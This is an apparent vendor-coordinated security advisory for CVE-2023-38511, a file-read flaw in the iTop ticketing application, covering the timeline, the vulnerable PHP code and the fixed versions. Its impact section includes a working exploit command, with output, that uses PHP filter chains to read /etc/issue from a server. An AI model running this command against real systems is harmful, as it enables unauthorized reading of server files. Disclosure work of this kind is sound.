File read in iTop
15/04/2024 - Download
Product
iTop
Severity
Medium
Fixed Version(s)
3.0.4, 3.1.1
Affected Version(s)
≤ 3.0.3
CVE Number
CVE-2023-38511
Authors
Description
Presentation
iTop is an application used for ticketing purposes and device management. It offers several levels of privileges, from simple users allowed to create tickets, to application administrators able to configure the application, manage users or devices.
Issue(s)
Synacktiv discovered a file read vulnerability in the iTop project due to missing validation of user-provided input. It is exploitable only from an authenticated user on the application's backend.
Timeline
Date | Description |
---|---|
2023.07.10 | Advisory sent to itop-security@combodo.com |
2023.07.19 | Vulnerabilities acknowledged done |
2023.11.28 | Release of version 3.1.1 |
2024.01.17 | Release of version 3.0.4 |
2024.04.15 | Public release |
Technical details
Description
The vulnerability resides in a call to the file_get_contents()
function on a user-supplied parameter without prior verification.
The AJAX operation dashboard_editor
allows any authenticated user on the backoffice to supply a file
argument. This file is then transferred to the static method RuntimeDashboard::GetDashboardToEdit()
in order to load a dashboard from a file, as showed in the following extract of the pages/ajax.render.php
file line 1048:
<?php
[...]
case 'dashboard_editor':
$sId = utils::ReadParam('id', '', false, 'context_param');
[...]
$sDashboardFile = utils::ReadParam('file', '', false, 'string');
$sReloadURL = utils::ReadParam('reload_url', '', false, utils::ENUM_SANITIZATION_FILTER_URL);
$oDashboard = RuntimeDashboard::GetDashboardToEdit($sDashboardFile, $sId);
if (!is_null($oDashboard)) {
if (!empty($sReloadURL)) {
$oDashboard->SetReloadURL($sReloadURL);
}
$oDashboard->RenderEditor($oPage, $aExtraParams);
}
break;
[...]
?>
No sufficient check is performed in this method before reading the file's content.
[...]
public static function GetDashboardToEdit($sDashboardFile, $sDashBoardId)
{
$bCustomized = false;
// Search for an eventual user defined dashboard
$oUDSearch = new DBObjectSearch('UserDashboard');
$oUDSearch->AddCondition('user_id', UserRights::GetUserId(), '=');
$oUDSearch->AddCondition('menu_code', $sDashBoardId, '=');
$oUDSet = new DBObjectSet($oUDSearch);
// if id is in the database, read from it
if ($oUDSet->Count() > 0) {
// Assuming there is at most one couple {user, menu}!
$oUserDashboard = $oUDSet->Fetch();
$sDashboardDefinition = $oUserDashboard->Get('contents');
$bCustomized = true;
} else {
// Else read from file
$sDashboardDefinition = @file_get_contents($sDashboardFile);
}
// init dashbard from the content
[...]
If the provided sDashBoardId
does not exist, the user-supplied file
is then used in the file_get_contents()
call.
Impact
Using this vulnerability and the php_filter_chains_oracle_exploit tool, it is possible to read arbitrary files on the remote server.
$ python3 filters_chain_oracle_exploit.py --target http://localhost/pages/ajax.render.php --headers '{"Cookie":"itop-bf***6g"}' --data '{"operation":"dashboard_editor", "id":"999999999"}' --parameter file --file /etc/issue
[*] Additionnal data used : {"operation":"dashboard_editor", "id":"999999999"}
[*] Additionnal headers used : {"Cookie":"itop-bf***6g"}
[+] File /etc/issue leak is finished!
b'RGViaWFuIEdOVS9MaW51eCAxMSBcbiBcbAoK'
Debian GNU/Linux 11 \n \l